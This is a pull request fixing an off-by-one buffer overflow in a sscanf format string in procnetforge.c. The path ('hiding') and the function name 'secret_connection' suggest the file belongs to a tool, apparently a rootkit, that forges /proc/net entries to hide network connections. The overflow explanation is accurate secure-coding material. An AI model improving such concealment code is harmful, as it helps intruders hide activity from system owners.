### PR TITLE
Fixed a buffer overflow in procnetforge.c

### DIFF
--- a/inc/util/hiding/procnetforge.c
+++ b/inc/util/hiding/procnetforge.c
@@ -44,7 +44,7 @@ int secret_connection(char line[]){
                   retr, inode;
     int lport, rport, d, state, uid, t_run, tout;
 
-    char *fmt = "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n";
+    char *fmt = "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %511s\n";
     sscanf(line, fmt, &d, laddr, &lport, raddr, &rport, &state, &txq,
                              &rxq, &t_run, &t_len, &retr, &uid, &tout, &inode,
                              etc);


### PR DESCRIPTION
The format string "fmt" originally attempts to read a 512 character string and store it in a 512 character array with sscanf, however, %512s will read a 512 character string and try to store it with the additional null terminator character leading to a total of 513 characters possible.